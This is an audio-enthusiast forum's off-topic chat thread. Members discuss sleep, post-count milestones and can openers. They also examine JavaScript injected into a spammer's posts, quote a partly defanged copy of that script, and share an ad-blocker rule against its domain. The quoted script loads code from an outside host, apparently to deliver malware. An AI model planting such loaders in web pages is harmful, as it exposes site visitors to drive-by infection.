Really Boring Stuff Only II: Return of the Boredom

Status
Not open for further replies.
Adam

Adam

Audioholic Jedi
Niki began actively trying to get me up at 3am this morning. I actually got up at 6am, but I probably got at most one hour of sleep after 3am.

I sure hope that she lets me sleep tonight. This has been going on for weeks.

mperfct

mperfct

Audioholic Samurai
it seems this thread is messed up now like the old one. Time to scrub the AH DB.

And I don't mean asshat douchebag.

STRONGBADF1

STRONGBADF1

Audioholic Spartan
It won't be much longer till the "15K Protocol" goes into action.

I hope I'm around when all the posts start disappearing and the forum gets a little bit smaller.
I'll wait until you're around. You wouldn't want Matt or Mike to have all the fun. :D
It'll be automatic. Just sit back and watch the fireworks. :p
Excellent. I always wanted to be the first person on this forum to reach a milestone. This will be it - for a split second.

"I'm the first to reach...zero posts?!? Oh, dang it."

It will be like going into a black hole...

(leave it alone Alex...:D)

njedpx3

njedpx3

Audioholic General
Rumor has it Adam will make 15K tonight

Good Luck Adam on your new milestone.

Is there life after Audioholic Overlord? :cool:

Take Care,

Forest Man

majorloser

majorloser

So, what is this Java Script you're trying to dump all over the forum? :confused:

Smell a little like pork products to me.

Alex2507

Alex2507

Audioholic Slumlord
So, what is this Java Script you're trying to dump all over the forum? :confused:

Smell a little like pork products to me.
I see that your talking about HenrySoren of the 2 new red chicklets there. What is that Java Script all about? I mean what is it to begin with and why would he do it and why is it bad? Is Henry a bad man? :confused:

majorloser

majorloser

I see that your talking about HenrySoren of the 2 new red chicklets there. What is that Java Script all about? I mean what is it to begin with and why would he do it and why is it bad? Is Henry a bad man? :confused:
There is a significant Java Script embedded in all of his posts.

script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://secureupdatetracking.com/xux/output/index/Ur5HMXLyMVIgg6uA1km1ceh8Ilg7r4bm?rand=" + Math.random() * 100000000 +"'>/"+"script")/script
Sorry if I had to delete a few "<" characters from the script just to get it to post and not run the script.

Alex2507

Alex2507

Audioholic Slumlord
Yeah, I was able to see that by bringing his post up on a quote screen. I don't understand what it is and what it would do and why he would do it. I'm even more clueless about this than I am about audio. He is a bad man, isn't he? I'm pretty sure that script doesn't put money into my bank account or make my computer run faster.

Adam

Adam

Audioholic Jedi
See that? Multiquote. I could have made it two posts, but I went with one. I think that should prove that I'm not a post whore. Well, if it weren't for me taking another post to say that... :)

adk highlander

adk highlander

Sith Lord

Sorry if I had to delete a few "<" characters from the script just to get it to post and not run the script.
I don't know how that javascript could do anything to the board but it is a very uncool thing to do. The secureupdatetracking.com is registered to a ALANTRON BLTD. and is tied to some domain servers in Asia. He may have some kind of virus or malware that is doing this without him knowing but I seriously doubt it.

majorloser

majorloser

I don't know how that javascript could do anything to the board but it is a very uncool thing to do. The secureupdatetracking.com is registered to a ALANTRON BLTD. and is tied to some domain servers in Asia. He may have some kind of virus or malware that is doing this without him knowing but I seriously doubt it.
I would more likely guess it's somebody trying to use the forum to inject malware. This is not the only new username I've seen this kind of hidden JavaScript in their posts. Though I can't find any web search hits concerning the subject, I'm sure it's not harmless. I was hoping one of you computer gurus might have an answer.

pzaur

pzaur

Audioholic Samurai
I was wondering about the file. I hit the Java site to see if there was an update. It seemed bizarre that Java updates would be here...

Anyone know how to block the script in Firefox?
- Nevermind - I figured out how to do it in AdBlock Plus.

-pat

Alex2507

Alex2507

Audioholic Slumlord
I was wondering about the file. I hit the Java site to see if there was an update. It seemed bizarre that Java updates would be here...

Anyone know how to block the script in Firefox?
- Nevermind - I figured out how to do it in AdBlock Plus.

-pat
Hey One Way,

I'm so glad you got that figured out. It's such a load off my mind, I can't even tell you. :rolleyes: :D
Care to share? ... you thoughtless ____ ... :eek:

pzaur

pzaur

Audioholic Samurai
Hey One Way,

I'm so glad you got that figured out. It's such a load off my mind, I can't even tell you. :rolleyes: :D
Care to share? ... you thoughtless ____ ... :eek:
Sure, I'll share. I'm gonna PM everyone except YOU with the directions!:eek:

Look for the script using ABP and then set the filter rule to block [url http://secureupdatetracking.com/* url]

-pat

Adam

Adam

Audioholic Jedi
Look for the script using ABP and then set the filter rule to block [url http://secureupdatetracking.com/* url]
I enjoy how you gave Alex the wrong advice, but PMed the rest of us the correct way to do it.

;) :D (J/K, Alex!)

Adam

Adam

Audioholic Jedi
My parents got me a Fissler Magic can opener for my b-day. I'm now a man in search of a can to open.

Alex2507

Alex2507

Audioholic Slumlord
I still don't get it.

Nice can opener BTW. I want one.

Adam

Adam

Audioholic Jedi
Nice can opener BTW. I want one.
Thanks. It's not the prettiest one out there, but it had good reviews. I wanted to try one of the smooth-edge openers.

I've had a Swing-A-Way for over 15 years, and I love it. Thing is built like a tank. We had one growing up, and my parents got me one for college. The image below of the model, but my handles are a different color. The black portions of the Fissler are plastic, whereas the Swing-A-Way is all metal with rubber sleeves over the handles.

Status
Not open for further replies.

Latest posts

newsletter

• RBHsound.com
  • BlueJeansCable.com
  • SVS Sound Subwoofers
  • Experience the Martin Logan Montis